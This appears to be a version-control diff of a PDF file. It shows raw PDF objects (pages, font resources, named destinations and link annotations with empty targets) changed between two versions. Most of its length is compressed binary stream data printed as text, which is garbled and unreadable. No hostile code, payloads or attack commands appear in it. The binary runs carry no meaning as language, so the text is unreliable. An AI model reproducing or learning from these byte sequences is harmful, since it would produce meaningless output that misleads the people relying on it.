'}]ͬ8t/€Þ†6$›GIÝ’ÕT«Ôƒ¡mŠ<Â6SÇôÔudrÐV@¨ŠÄwªªÏ`!8tzÙ°Y‰ª¦eƒù²KJ²Õ¤ $š%qÕàr!Š<*–Zò/ìàÎé òƒáÞ;ܱ€|F¯µ»5Ô«0€>j8*‡èŒëìHö;ým¡™TuªÙ•Ü›DÀ.‰ÒHO·_q¨éÖëura£“»å•L.%ÏtÊ䦱Né!ǹÆ¥(æ9_²läÔ$.ÆÜCL$¡Âpçt"—l&2›¿6‘ºyv¦‘ÖMãBèzs +éÓcuM¿Z<)ÙÎéå¨-—q›ŒÖé[,ÚIÒfÁµ¼ºèƒ?ÝÞ\q:WÙ|’n!ÓMS~•í“í=–:!X:œëýÊçOmµ…½ðl¬Ör\ÏNF¡2÷ûǰ¿9—Û¼àŒXeû8”¹¾DˆïßÏ@BŸ¸úDo +u^ˆÔòƒžH]jë` „ê‘«Ül¥erÒ{S¹vã]h¶¯äB3û?¢ÙÛÀŽ~Oä µ|NçâQé±x×[ôm?0ÕCr•pxü=ÿ…yoB ÑwŠ{÷—ã‹·èú—¦â.}þÿ¿'ÃqãÉ2J= endstream endobj 705 0 obj << @@ -3275,381 +2934,385 @@ endobj /Contents 706 0 R /Resources 704 0 R /MediaBox [0 0 595.276 841.89] -/Parent 690 0 R +/Parent 708 0 R >> endobj 707 0 obj << /D [705 0 R /XYZ 72 793.935 null] >> endobj -704 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F26 418 0 R /F22 344 0 R >> -/ProcSet [ /PDF /Text ] +206 0 obj << +/D [705 0 R /XYZ 72 760.449 null] >> endobj -710 0 obj << -/Length 1614 -/Filter /FlateDecode ->> -stream -xÚíY[sÚ8~çWxf 3`,cÎ Û’à´ttÁ´»“ÍdŒ-ˆ·¾Å6$üû=²$s3.MšmöKvŽÎõ;GÒ‰$,IøPz(!% -Yhi’ˆ4M°¼ÒÍ­$Øðý“ ‰ŠÖS*OPšm]aRú£ta”êW24QkÊMÁ˜S Qk¨‚a 7U<«µ5¥2Í>»5>Õ¯ºE¯¨mQR€aJÝl’’ÄTÞM¡ ´M…ÐÖ”FCD™ˆŠ¢Ñ57÷÷çžwŽš·g5UV+7ýáÕªŒØ«øs'òAßçK×¥3ÇŸ™¾MæJ%~È>þƒ­Ä |úÊÇÐŒLÛGôKÙ±ËDYP´†dðPã$u’{Ì&f´À /#.=¦ê˜ó9hmúu¶¦£É”ÁO¡8‰9¾.>n–ºkPSËr´^-]GæÌqdK`ºcºôÉùYM–4­R¾O’ð¼^Gš,¢f[D"’Ñ9ˆjKuî™aÝ[äî8q ¾süD4ãðécwµv:솔ww0 “‰>Ð/ ~t\{úÐN?ÜnÌ]C°‘¤J9Rx vã¡V.GÃË®ñ7¬ºüØ“±Ý¾Õ6ª¶U$5ª-µÚjÁP5O¯ë~,"¿/úxrÙ+¢KRÙˆ k¦ß¸ „ZU„ø©DHú*É |gµš ™j5:äñ_…8š‘Ç‘‚rã°0I YÊ“¿$0[ÉBç]ÿLÜ S 8Ëè;êÏXÝ C×±L^3ØÇÅél$Eqõ<¦Û’GaE$K‹Lß4?€ø E@¹•Ðë8Á^AFnäx½7}¦3£{1гjÞÜqñIæ°¿ë]C/@‚l›‰É+ÖSrrÄ Äö‡}lð¹1:&5••R}é¦:sô&_ÿNʾD¯_T|Þ¿'†ÚN´WnÐ å&3Ä/7Mµ¥tÈã9ÞyróÝ¢¿ ÑTÏM²­sZùêøvð?'ó,›~Æ|îée›äpfÎ̘}ðLNœö“£9¢Ÿ#ì«YÛ[>tqüÒ”û…¤àøâÌ™—QÄÜ¡T–1/Å<6½‹î[ÍÑ”ª;ÑóôûúQnjùm¦;Žî`ÃXQš«ñèšáƒœJEî…ð³jK>vRNÓ‹‰1î?Üõ‡=ýÏTéx jêCãn -…’W8n3¥©­-(« éŠAÿºÏt•¶ËK'󊶻ÀÈìe§g}0Ñw²\ö - -ññ^*(PHë í9éú_'ë[ßà ‡Ÿ°Åî½+v˜q#lÚk~“râäÍ£ž–N÷MQ¯V|rWMÕØÇû|é[?Žw4€ ``“Q - ¦Le)5#QÙ@W݃nžšù¼S0°? -vÀö–üÞ«d .À{Ž®úM’:äñë¶g–nÛ`V9˜•0ÇÌ8; ã:XRÒG“ï„ ûSÇÇÈI0¿/¾£”7ëúð–#£Àp凳qeº/ÊFåÿl¤é‚ÚU@ºý:Ù¸Ãþíd£ÒhuÈã9ùùÙÈÀüV²Q=bø7ŒÃ,S¥¶OèPTÈy·®@ZÆüè ŠI#ò$¯ÐÝ×lA6Ẫƒ»Bî»Ør¾xp}°y“/¹1äË$\nb÷ íN<ú3A/PØE "vûnà/Né%¨ùÕl3AvœÞî­¼Ù‡›ioÛy'7r¯Ùxîø|)›¤Å y—¤y=í턘ƒ[Ëc­ñïl™®› á÷ÛôeÄú³ñ=v]‘… à!r8†Ö!sOù©L¼IöPÞóLá˜q×IƒÅÐÇy*q-ú;ó{• ÈçÎ"z¯8©¤8‘Ëôn#œ@©\á½{wêGÒæ³³fàA²¼cŽû«îßyX{a{jÎÇT_…€<òZNýÎ)ŸÒ«Ò~á¤E²“ˆ±ó¯2>êFé_ü‚%E -endstream -endobj -709 0 obj << -/Type /Page -/Contents 710 0 R -/Resources 708 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 690 0 R +210 0 obj << +/D [705 0 R /XYZ 72 621.198 null] +>> endobj +214 0 obj << +/D [705 0 R /XYZ 72 179.422 null] +>> endobj +704 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F22 409 0 R /F26 499 0 R >> +/ProcSet [ /PDF /Text ] >> endobj 711 0 obj << -/D [709 0 R /XYZ 72 793.935 null] ->> endobj -708 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F26 418 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -716 0 obj << -/Length 2259 +/Length 1495 /Filter /FlateDecode >> stream -xÚµko7ò»…Ð; kÀK-÷)h '¶S¶“ÚÊ'((-eíe_á®ìèßß g(ÉÎÆh‹Ö€¼Cr83ΓÁè~ŒÞ|>ð Fr”…£l9ŽÕÁÝÇ`”Ãü/£@ÄÓÉèÑbU£8À·Ýüzðjv0>åh*¦i˜ŽfK¢‰i”ŒfùèÎKÄ¡?™ÆÞûNÝëó_Æç2ÙÓ‰b h±Ó Q h§£ à¦1âúq Eˆ8žÒžAäªW‡~&ÞÉ-}_Jïç“\”ü ñwÄ˼…Û7%ev$e|¤L޲äÈÎá3×ï// :¿y{…PìuŸËJµÍºo×ý¿X ëS<œÇ—!(2"©3¤?à¿¡Å»Õ긪ŽÃéG¢qwzö -Äyÿ†Ç­6ËÆT:§¡¤Ïçµ6…îH’¢¦É€>^4uÞýfHvsLðéÙåÙìì¥SqX4U¥j¶ëT8ðí;Úèû¾›c1d4ý[QçÍcGÛ/Þ‘¯›zYܯꋦv»¢LÄÛÉY¿Ò¦Ö=mS¹j{ R_6 UòÍÆ4k½°-¤”±rÂ2¥D}‡êw­^ËbA{N¯Ù"o×ËeñåЗ`cž ¹cÂ)‘yÞTª¨‡Ô@GÁòÜè®ã½‚öî^ú¼ŒÉ÷+§¡éÔ"¤¡|"MLÒÜ®ç[-^©îÓ?'M˜$~( ‚•ÆwÚf(§z©Ö%ËõFÙ»}T›@;BZý<±L¶‚¦ó»•.ËiƒþRô/¸\,Ë]\ŸÍ·<\”ZÕE}O£uK_0_ زš«Ž'À¹ ¸VºæÓw›®×ÕbüÌ×®š‡-çnݶa¢½š—ºû+DŸ›·l̳“W—gûñcY”zÈÞþ&òßOyC[6Íš€GUwîfO5z«àßõ½ ÑûSÀ>ÿ‰¥ûï¸fÁê¿‘Ùƒ NŠ«.‰‡í ³æËVÈ`H;£t¶¸,ê =ÿCL;¹:××{V¦«¹6ήUïÎvN7–ojU ¿,j/e17Êl÷Ò¥¹N=¸,ØÔÏüÄ”; -êxØ'ªvJf0Çs³Žt©{ÇT´V%`}]ÇØ0dðMÅ$åppRFqìmɇŽƒ:oMp§5KÓTE ~ѹEÌÙ4«¿¨ª-õŽR¶hÂúD±éz¨«•¶ŸO4U,efÖã⣕‰&Ö6~®‘T­™#l’Þº†”ò65ˤ ÓP%dÉ|³Uh$ÒíV@e(kwøvqÈÜ„ìÑÑ*ÉŠÂx¼Ñ­XAqaæõnWC_£‰ç–VEPä>áV­Ûçë¶(A„N!ƃEc¤¢Ò‚îùI}‹EE(¢©tåíT„ )O½wp‡-žl÷‰J3ÛËžDXèøÍÒŸW˜°©âˆà -¬Ì´ÿ36ÿsýzÀÜ0ï@r Xåo[¬<ºc8Ü/°¥H’ÔØ‚0$Õ>ÖD£T¤»Züh€X*(Âöhµ¦xðu·ªì3¤áŸ¢VuK¿Uýj€Zˆh²¥†*üšžœŠ(}B°¯Úoôà 2NÀv'"ËØc/àþÂ)Xm‡ßГA7éºbŽÁ—ÐèpIw˜! Ò´ª¬E†¡ -,ÒS ˆ2o†mÊ;‚\¯—ëG)øqz+Ee9 ¼Ì¦‰£;·Rê_k]³°+MÒª¾G‡VÀo.D.aœì9a1:¸akSn°°EÌ ½ÝGoH;kn¬ÂIæj€' ¬n^w[b2AW“Ä^[¢»6ÎâÂí¯—„ZÔÿsõ7Î«Ž¦ SÛî8÷M .ëÇáÔ›Ù Š8o)0|BrC‘¶|–èd¸zµ–GCÁì “]o´•* -%‡0𮊅iºfÙÓÐæ•¬ Ê»€ ‹F—¶KC†_T 5¾Ø‡›{nÈoÞŒî,Ë+ÔUçßiëI«Ìx6"Aw3Ø&:3SPd{ÂB3k—¦«Ö{é}O!–ƒ”`›232aÆv Ö†"R‚°c{N¹å`hD¶¥[Œy¢ÿ¾£é¥ÑL‘ €ÍѰ¥Ój)4øºlT®s·Ù&R€(¥ ¤M¥[(mð.ÀÏ.z—Ùýy]·ßòÐÐé¯4\B[¢ömš8?„mT¥)šO4Í·ßYËʼnHDû) \ŽNÒì)šŠ-˽tÝô.òØJ‰ -P¦!ï­ÞZ‘W7Œ‡<ñ1dôàãsä¶áu¶K„ͺ¦¦ ÇÛj[-3i¾€…BYz;•|Ï8Æ¡ré19Z?×%¢•«ÃpÞµ¢Û”L¢gží@¤Õgk§ÔmÑPCÚ%ïø©Ôˆp³v±ÈV8ßj}¶ÒµˆWTM­êZ k4–s8=Ô™9ÈÎ'Îö2ïqUô ¶Ê9å ®x'È,Ç#?&)(oá¨S|òmaÆ àYHÆ9’òKI³pCV ¦)¿ -$°<¨”3ªBÙ’ùÔ@ÞK#¨¯·E‡®TÍ@/è‘ïYFË!'Û½2÷šÞ„¶‚}ëûü‘P‚eYb ¤,â:íßüp¶éW®OÀ–Àš¿h¹ì÷¹%ûnÕ÷íñx¼í÷… ñ5pLî2®6ŒAÀß‹º`ü_~*òäw´ûƒŒb«¼©ˆeøü‚‹/â÷@M ¿ßùþ¶þ±ã1®qQCxêÆ˜e±s0z\í‚MÎÌhÿ!âNññ…îLfÃ-á¶yš«Å'_»G»ÓWWüŠ…FÇ/ot­<õܽ:šjóÀiÛ­QîÞ(¸mß{Ћ½0"nȸC„™ÉÐËÀ–jÛ²X¨ÝC¸ìªnÊæÞ= œÜ¾×g3~ºµybS·}E¼àóAMzôd v›Y˜ ÷k]ñ»>Îþø}Ñ‚A»>›üØéØ +xÚµWÛnÛF}×WA¨ \ïäR@QH¶T8hš¶ +Õ(VäÊ""Š +IÙÑßwöBJ²é$5œî…ÃÙÙ™9g†Ø»ó°÷ÇàË€Àˆ=âÅÔ‹ŒH’xi1˜ßb/ƒýwF<Þƒ‘*< ×ÞÕàÓ`r=8›Qâ%(‰hä]/­†z×™7÷C4 DÂý›ZÞ©áíõ»³ äy(æ ÐHs®EØ™ö½ÎŽ<º"®uœ1DÓÄybuþ2 BúÛ}³*7v^‰ÿe]È-ÚîíN°³ã›UÓlGgg$¦ˆDˆPÂŒœÕ想íLÎîTóo¾iÐvµý=Ï~#oœ vµªj·¾·#Ö·‹ÊQ""kW&¹µ²"…Üh¿P›ÆY¹¯UØù‘Ò9»µú…Ð0«oþöÖÝ´¬›»JÕßjTÝh¥?$DmàNmî‚c/`E,n££hÂÿFãic9Üßʺ~2ê—lgvs%땵õQfhw…ˆbÆÛ&/7õÈ™Bsˆ 0ŒÚ +sNYeÖ€§š#ŒD—rr“õ¨$ b&Ï­Ê›-à2‚bȼ€Ç.ª—<ƘŸ×vÜ*ü²®óÅZÙ­¦Ô#÷Õf¯v…ªdÓ¾Z¹‰u}s ½ãüdæKp ™(™j¡•]2J¯lFögU›RúxXÔ…ÿè +Ó¯²Ø¶ÆjÈèQö¤@(K:¿¿ß_}úSÇ”A`Å=>‹CDD÷E#+Òè‡ ÿêÇ!äHŒHøJPYr€z±ÿÔÛDû¸w ÊÔ"—›B¡U2oñ>'Ø Aù)&9­Eu2Œô”ûo'“‹sJ/è„L‰84¡TDJ&ŒŽÉDs˜H ŒM¬Ÿ¨ï¬«Ê²5G{ãE 2 §”Pr…àãèü‚cFfÓÉlg€jÐ>%“‹øsLe”¿ÐIO)'á,Ó£ñ“„ObpÙ4Ž’ 9Õ&áÙu¨'`=T Úø÷2½ÜYx¤²Åɺ.„«Rcó>ÏŽÀÝÃ4„ †ÃoRÉõ¤) s ÛòŒJóåþ„J,ÎíÖÃÊIï5%XÓ¹ÿ ò˜%MœNô%$…\T¾±à¯C.yZ•u¹l,ÁtLs¥ª{]QÌaM1ƶ®Àˆç}ž*»þ¨Å€.áùÙÊâOS`Æèk0 ý”8†?£)êÿÉPÿf:,¸1'ô> endobj 712 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [336.86 278.603 385.112 289.394] -/Subtype/Link/A<> +/D [710 0 R /XYZ 72 793.935 null] +>> endobj +218 0 obj << +/D [710 0 R /XYZ 72 673.413 null] +>> endobj +709 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F26 499 0 R /F22 409 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +715 0 obj << +/Length 1122 +/Filter /FlateDecode +>> +stream +xÚÍVmo¢Xþî¯ “MŠ“p½.o&› Uì8Qp3tƒBÕ¤ ìlÿýžË­[ÛdçÓ…ËyÎësž€……€…«ÆCƒÀ‰"è² ›Óæqãæ !Ü0¢¦!ü,¬bjœ÷‚×øÖ¸ô­žL™š¬ þ÷¡ SQ?nD5%äâ$ QóÖÿÚêõ™=U „)8,¬©ÊL¸L |k‚¶e¶UD…= JM޹Y.ÛqܦæmSReU¼é;½&Ýòõ.ÊçËU²àoa³ ‹øÛ6‹ÒŒ=RqdÙÏuòË [FYé`ò‡ùܦi”ä{4KR•ˆ =R>P²gQ`}wv.EìÂøb³ÎòEeÈ%òt=Fa›¿“ÿ\Ï©ÜéËÜÕ_›{ª¡¾35LéL[9ijY@°Ì#S IDë’"FU"Æ»IgOYÅGœ9¬•–µ¶k+ù\æ\ÕË7ä–›2-1”c^6²ÍQu*Pç¾È;(rN"ïÙÁ^²•Ñ"HŠŒt¢TË©#½)BMq§˜AÙEyŠ4LW+¸¸ñËÕ…"eɸÜCw“¯Ö o—Ÿ/9AªªUK.I…gpËBÖºÖ4„õÊ>HŸÄDж³‘&5^ Ÿ2a4X×5nÚ‡¡*Š"®2~nš’lˆë,[Íî#~•¯ÙIÅ(i§m¥A^}Z–U Q馠w +æ µä×{n±7έ˜û͹}E.ö‘ íô,iûŸ ÞTé­~IÍ 5a¥j‹›óe(âµÍO‚‘Œ@åkf”çAºˆòö"Ÿ:•šÀÈ U†èXÊþQ.ÁS¾d%›õÀ´yâ7Ò–ŸŸ–y¾i·ZD—ÑL@úÁV!­ìZ뢶¤8]%9Ú,7­Â?É'¾%{’UÚ)=òWý•)2 ý@kdµÒšïÖ¢9}窼Ù&AÁöÌøñ\‚xÈ‚õš®Š‡ÙÔ«¡å¸Î¡;ñ^“CÙø?SìöG¿TB«˜`ü†vvükï‡W*§\§œ%bç³½Z£QïcË±í¹“qr± s©N˜w u/=g8zMÊO„qíátè:¦ï»ãšHÇ¥÷îwoŠeL0€0¿ü«8ãU²ÊrЧu +¤¤}O{\DZ;þ9ýé^Ziãæž=€øS0ïX¾5p¯¦cwpÎx[zýý!Zœ_÷ë¼8žÖ—ñÁ€U;#å·šÑëvËÕƒ¼ÙoÕïÐfwâœ}NïYÀ÷Ú•ÎÊd­v ò{Úb}›ZÝa¿pÏ[ {Úã£_Á—؉g3ñ 9nⱟI,™Ý-ðgàÞ1½óeöLŠvA|»VÞ@Ú×vgâÛ¬A'¡ôt4íML»€½´¼³B^YÐà1KèâƒÀ{¾åÃdû¯öÊöÿüº ½ +endstream +endobj +714 0 obj << +/Type /Page +/Contents 715 0 R +/Resources 713 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 708 0 R +>> endobj +716 0 obj << +/D [714 0 R /XYZ 72 793.935 null] +>> endobj +222 0 obj << +/D [714 0 R /XYZ 72 647.105 null] >> endobj 713 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [287.643 200.164 535.068 210.954] -/Subtype/Link/A<> ->> endobj -717 0 obj << -/D [715 0 R /XYZ 72 793.935 null] ->> endobj -254 0 obj << -/D [715 0 R /XYZ 72 369.618 null] ->> endobj -714 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F26 418 0 R /F22 344 0 R >> +/Font << /F21 408 0 R /F15 404 0 R /F26 499 0 R /F22 409 0 R >> /ProcSet [ /PDF /Text ] >> endobj -721 0 obj << -/Length 1390 -/Filter /FlateDecode ->> -stream -xÚÕXßOã8~ï_‘·Ý6mÒ¤´<Ü -Êö…ƒ²¬Ä¡“›¸­EbÇiéãÚN%)t¹“Ž—$Å™ùæóÌ7ã4­‰Õ´þ¨½Ö¸6-Ç:q­“nÓvº]+ˆkOÏM+„߯¬¦íu;Ö|¹*¶¼v®‘u_û³v>¬5ú®cuínÛm[ñ²Ñ²»-߆ÖÓ‘o×;]ïè!E|ü<¼jôm½çw즗«Û¹¤ÖÔÐÀvÛêÀÚ¶'×Ö½VËvZ-«îûv×sÕ;OÓéiŸ:'ÏÇußõž.ýcçèF? -œ -B'ê!(xÁ¡zxÍ0'8•ÞQš% ãBý‡QuMG1˜«Ç/`–„_$D€Ww\à¥õ.! V0F€¢Ž©Æqq~}¯@Ì0O‰q>æ,VwD¤æ=J1˜å@àX@´3žªgßnÚí“ -Cn«„Ð)V7sµø6ÒÓ€…Z¥?G†|§ì1a‰~›\9‹’)r•ûå=•UFô qMÞp ç6w nïwµÁ‡&ÍjƒÛéq6c$Ô3Á°ßi±yÉ;&Ez(Š~óÔKÐã4Û?oîöûm›Ä…m‰p}´:/ó·{,£†aºß˜9<ý@œ ˜‹–*;:ú&m:kÄl¦…w­WéÀèÚ-‹1ãÉ”èõ*‹“†äa+ô³0$«ZëcJñßI7Ï/Z_îk96“NsíåÎïÇqvÂ‚Š ü VÖß-›Îûjái¸ 0öDÔú¸ù2©4o4É9xD4ÊGÌÉ™³‰ìøÊµ½ógúÅ.=·Ä%‹i|ŸWs¸7(£ø-&C£ðs™"ŸDÆ©qaXt* -^Ù‰‘È|[0šk@+lùÐ4†•z|ÂÊŒ¦åâp)À3{¨x7_i -ØD#f’¼e·êл†­žÕî8š±áÔÌvs{]ý” C÷˜™ù*%`,†Í9 Ù*7˜9¢½F1Jì"¨—ú͘L¦bísŒÙ¯TÛ¤ŽQNMÈÈôæN¥ûª´+ÙÕ,‘-7? r½ã_z§ÇËÁÅÍã}cˆAH•ç8O¤%lĪ/J^ÙA4£´òT&ûÃΩ 20Ff6Åyñ@ `>Fþ%bHþ⫈°íÿ e)­j¤/€•™5×ïÃÚ?àø¡ -endstream -endobj -720 0 obj << -/Type /Page -/Contents 721 0 R -/Resources 719 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 718 0 R ->> endobj -722 0 obj << -/D [720 0 R /XYZ 72 793.935 null] ->> endobj 719 0 obj << -/Font << /F21 343 0 R /F15 339 0 R /F26 418 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -730 0 obj << -/Length 2303 +/Length 1399 /Filter /FlateDecode >> stream -xÚ•ioã6ö{~…Q,P¹É"uØ.2™L›n<“NÜE:X0m«Ñ5:âñþú}’(É&cRäã»/Òž¬'öä§³/g F{Â&Ÿ‘m±(šÄùÙÝg{’Àú/Ûr£p²UPùÄõC³ÉíÙ¯go—g³÷œM"+ò¹?Y®‡cEŽ7Y&“;ó¦f¹ÆoXËéçå/³÷Ì;€w½Ð²]@¨ ýAÎlÍàö'!Àú.š®ãXÌqpb¹nDgî~ø<5=î7™ĹklEÚÒêv“fROõ˜•"¡Y»Ñðy™t=X[KiYr\˜ŒƒøÎ ­ÛVÔ­Lèð}Zh|Q$™¬_?šk:«9ðŒJìö|i<¯q±¬EÑäi è¦ÌXÓbZ´²Îe’ŠV£nZÐ}MóUYáòQÖf“þW&@@ð/Û³9óiñ~8˜ÑÀ"{Y(Y$ƒL -­#¶€…Žs€ðul "T5þjŒ²iÒ² ]FCYÉ¢gɰˆ«óC‹Á/›»AèpÚ7ÔG#Þ 0›ûÌ ÃC~¸kEa@üäÇlxÆÄÍ5ØI ëòk+‹=sU>‚›.ü1°=jÁç0¯e󴃯‰[Y?öÀ]#ëBäh™9­|XÒxþÛò矮–þÅ÷öÏÛååâ[ȧU\«t}¤ ŸÎ,nµÏ]ÜÐäº,ê^ÄŽ·±#ù³¨“­¨µ[,Î/æDÒ¶çÇG‡]:|¥Iž'I *šÌv£^vƈ£.õA¶¹h€Aî1}‚{ž:1Ðr!AâR'~_ìÙNy` €<²ü(›v]ËC`dàƒF‚ÍJÞš˜s@çkP:z)B`Šá™3˜ó°g¦"B͘*]îƒ{.™cù\ë’ti†Ð(Û }ž¨Î3D‘Ðä*¬w_¡ pn,€Ç4®Ë¦\µ¡¥$·Pšš–¸ ù@„Í„lé vòÆíä8XøÿÙÉ;²v²–B£_<å}Öt|¦\öHU$N¨ ë8®õƶ=úPúq% i¦ŒŒ“ŒBPåŠVT &iÆRÓQQ¹íƒ ½.—|üôot—Ÿ~¿º€ b\ŽÈ2+ð†ƒwM ø -Í ²Bw8zýñâüúâ5?€tõG¨@‚wxVä¡!v]t®P‘o¤ÈAhãIï±[Ã¥¶$ªVø˜&’š/(mjÏEE°Û=7Q¥#!BH;ƒüescË”M<"†Ç,›±¸¬ZÕ(ì%Ñ÷]£¹9 -\q¬R:Éð \¥è÷”`cñɰ•SZâ ¥Ðõ]­´8’*æ{‡½®eCÉ×`¨°´ÐXÑ qrÔñÀÙwg¸C¼¨b‰éêälW$²Îvª{Âï²R™jl;¬5; ¦ANR-YQ¶4©D£Ê6’ªÜ1 ÈO²•X‹´èƒé x³MÜÕPDÇŽVÞv™ª[ØLÓ%ïDõZ_Ž>ýt6¹S€‹[;2mh ¯*jÏ50͹!ø^FNངÐyç ñ¢½ïyÇÞ'–ÓÐ1z/!¼iRˆªBµ0ÒÊSæ¦H¿tû†ì@9÷ZtEFWeº¥}–+…ÆÅFåòºM\žEc‘^ù§*]†}Mj ™Öú= Ü‚“™^QK eôŒìŒ -ƒð~ßH%”,t}º€è2‚l€±[)CW¡ãÔ0¢[¥x š5%Ít¦&[Ñ(Ù¾oô¢bã¢w]Ý>gdŽ".±fx"ÅåSKòà †bC³£rKBówá*¹ ¶ôçQ~øTã‚nÿﮈUâÑ‘r”݃ÁîTZ0§)²²Ð¥i05~¤Ç…Ë¥vD-©–G¨¦ Õ¾Ý”û;ÒAîÿPâýÕõQó¢íg˜ p¶‚,ÓÕ _Té'MWQØ•tKǵÞá]Ÿñ©CŠú í®ê2ïéi -ï.ßÒ¤*ï)ˆ½V<Ôʨ=—›^•›Â>7R½•@`A)ÓýGYœ4@ÛMÚê• fàå(ss$•<*{q/„ê:I¶¿e¬+7RÒþ}Z—”Þ .É\«ºÃD…˜ †”3×eö4zcT—_E^©†ù$$ŒBíÃ×4Ÿ« ¸®Æ‡%Ìw´ ¾K­&fŠš¾¹½¦·ßLcIGn¦*9L!öhÅé8Ã{ÿÐ1CgZ˱Ð ­(b/ôÏôœÞ^¶^ djœˆz-Ûù‘NŸOß Ìu¡] -,ßÖwÉèš]»ékГÊVµÓEßmÚ¶šÏf—l€ålF™c–70™¥i3&ÿÓ´5·  ü _eþ™uS•9êïôã\p•D–Ëøñ×4ËÆ¬¶šó‘®·ú…Ë4ófeB«³¡ïÙúñYZ|é€.úÁAXÏò¡õÛÖ‰© ¾mÝY–õyôn³™çùœú-îîêPyÿñóÑ‹)ÜÈDü`ÊþáóÝÛþ}(¥*­^;öþª\áä`„øVÞkË o.>ôõa¨¶Têç Uù¶ ªëâKX¡]‚„ ¸JÊaJ oŠ2+×;òüöÆ~³—»½WWZRß²ß GÆè>U‘~üyE1ôP£ï‹cþ¹<û96' +xÚÕWioâFþί°V•Ö¬êÁc Fª*Bœ]V²˜ì!6B`±MØüû¾sbB¶N[©ê—Ìá÷xÞë¢+kEWÞ7îV]ÁJÛPÚŽŽ°ã(˨1»Ó•î?*:"NGÙs©H!vÖ­â5>5.¦Ö•9¶a+Ó•°a"Ç´”i ÌT 5µŽCÔÛÜ_ÓæÝôcë +[Oä‰ÕA:ƒ\šØL¤¡Kh`ÛV: k&«L©;°1!ŽÐI³ð!ÜÒ5í65˰ÔÞ¼w94±z=ŸŒ‡.³Ö4l@æyÁèf~u;áü²7í]ô¼ZzÃñ{ozyz߸Óë7ô¦ãIå±;¥Ï <ðêkŒÆ×L£¦›á-CýZMÜþø³;áõ!à|üåÚ­:#/){ãÛI”kùòúÜKžtw"²WK˺ýéœE$ñÕ-ò×Ë‹²1jŠq/<ïó ïz\IÃÔ1HUuöîN‚ûæMÝÛõ»né~…q˜™_$\`!63îºÜÚ9c§8zŸý\v×ó_¨D\õÔpz†_í´à?w -ÃW¸éO¿önnêµoÐ ×0Úh›XÑŒ6j ßšSMvMÍ4MuéÇbãoóDìÒ,imõ! ¨¸(6’Å ã‰eŒ1“UÒ˜v{Æ;çm§IÒ"L¤»B:ËÓ¦ftTº WGo°!ê.§™¸Úo¤ôcdt¢îÙàÃßBª65¬JQÊ?ì" +}H+–Íc +s$khXHï^Ìv[æÉýáGéVª”¸}™‰§üo3;våMÓ4Ô$/Öõ> A ²ÝA&²Îä^Bš…Ÿ­iÑ­</­§Ï6¤Ã¤6²l9¿ˆI‹ ÃÏö9ôÉý6òS”>Šm'Ö7›¢H»­nÛÈ€Ú,6q+ç +­t › œ‡qÒMú{ü†ßH+ «ó*.¿c“ð;ˆ`£ÚÆÐ/œHU.FQ{·º¨‹Ô3r:²*_ø ?§B.òc ®iDãBFø˜4{ÖBK‰ çÝsƒuÚ*¤ŸqšùЉ^úÅ. êLô2£Ð³ ]ÔÏw) J­ÑïALD'Ç9bNl“S +>…ƒa¨•“ WqÀ+d»µM¤ +)¶ÃÊv¸Æ–eÚAÚÄÄLØ%f4S„ßu“Ð\Þ®^´J_}ÀN¼X6(³f"Û?™Ê¶àCü´œ‚L|#'$à°±ÏKÎs!Æ«$‹ü#…ÅôGQ%³ +uÅ~DÑ ã[ @Œ†ƒE`NºAºÏ¹Ö6CÚ%Oô_ ZÓ:°±Ÿ ³%q + ¶êê>ÜnÅÍ2‰sp™=ýŽ¥¶ÎÈUœ·aip•HÙå.ËÊt\Iq–˪Ÿ6fWELjyãtÅÿßaäÀ6÷;š=–ΓöêTvóÆ—0¢$£¥_β/€­Bº où2²½`M^œd/cˆSqçr£È®‚‡-Œ—²IȰÌI)²üÅ– +±òKY—“˜“]‘î¤Eø*ãWpi® uȲu± ãà,3ºÓÆŸT¡™à endstream endobj -729 0 obj << +718 0 obj << /Type /Page -/Contents 730 0 R -/Resources 728 0 R +/Contents 719 0 R +/Resources 717 0 R /MediaBox [0 0 595.276 841.89] -/Parent 718 0 R -/Annots [ 723 0 R 724 0 R 725 0 R 726 0 R 727 0 R ] +/Parent 708 0 R +>> endobj +720 0 obj << +/D [718 0 R /XYZ 72 793.935 null] +>> endobj +717 0 obj << +/Font << /F21 408 0 R /F15 404 0 R /F26 499 0 R /F22 409 0 R >> +/ProcSet [ /PDF /Text ] >> endobj 723 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [226.571 308.208 271.448 318.999] -/Subtype/Link/A<> +/Length 1144 +/Filter /FlateDecode +>> +stream +xÚÍVÙŽâF}ç+¬Q¤˜Œ\Ôæ )Š˜nz†Ó+)ê T`ÓXƒ±Çe˜ åãsËUfk÷òЉÂµøÜýÞ£ÂÖƒ…­­ï-+¶ˆåSË1"ahÍÒÖý[ܶ0âa`ý¨P©Å½Ö¥u׺i}µ:”X! +=êY£¹ÖÁPÈ\kY÷¶‹ÚNrû«q{<úܹ îž»ÂVhî+H ×@·g€õ¸Â:œ1DSÄy¨eî‹nšv©;n;.uíûÁåE›ØWæXÄe‘Ä›8êê3Q@»C(„Åþ_:"QŠ©±†¤b¥’Fì4^•úJne§z¿–q!õ6/’M²Œ+°ì6z÷‹ñ#ÏdùPÄ• ·ÿÄ.Qš¬Y¢Ì +¸ Æ6ÖšH€ÊÕí šhf¢\çQ“áGÈ"e£Ó#8o†Ëu }£ZÀgÄrhk …/³RG×.¢¬w‰Ô»9^P_®2ƒmêÛ›¶ëÙ"YŠé²ÆÍk5æb*fmØßœxé›}ÑÔI *¦PFw]µCÃ_’Y‘Éln w7m‡ØCsPu,6Ê£¸@:ú£)ƒ¤1Š|Âë!óQò„‡v¯Mª@<¾„lç¥lH&¨£.¢ØLÔU^&ÙªkìÒ ó‘GýzZ'š6©s ÌÎñ}Oƒ(c¬Š_­¹ +ÕΤL´‹pUfjå¶ÎÝ:¡#ëO ³YB£ê]6×è]`h×Ofû‰4¯ 